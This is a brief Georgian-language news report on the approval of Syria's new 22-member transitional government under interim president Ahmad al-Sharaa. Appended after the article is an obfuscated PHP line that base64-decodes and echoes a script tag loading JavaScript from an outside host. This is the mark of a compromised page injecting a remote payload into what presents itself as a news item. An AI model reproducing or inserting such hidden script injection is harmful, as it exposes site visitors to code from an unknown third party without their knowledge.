tube
ავერსი საქკაბელი

 სირიაში ახალი მთავრობა დამტკიცდა. ცერემონია დამასკოში მდებარე საპრეზიდენტო სასახლეში გაიმართა. სირიის ახალ მთავრობას 22 მინისტრი, მათ შორის ერთი ქალი ეყოლება.

ახალი მთავრობის დამტკიცებით სირიაში ხუთწლიანი გარდამავალი პერიოდი დაიწყო, რომლის მიზანი სტაბილურობის და მშვიდობის აღდგენაა.

სირიის ახალ კაბინეტში პორტფელები სხვადასხვა რელიგიური და ეთნიკური ჯგუფის წარმომადგენლებმა ჩაიბარეს.

სირიის დროებითი კონსტიტუციის მიხედვით, რომელიც ამ თვის დასაწყისში დაამტკიცა დროებითმა პრეზიდენტმა, აჰმად ალ-შარაამ მთავრობას გენერალური მდივანი უხელმძღვანელებს.

სირიის ახალი მთავრობა ბაშარ ალ-ასადის 24-წლიანი მმართველობის დასრულებიდან ოთხ თვეში დამტკიცდა.

197
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");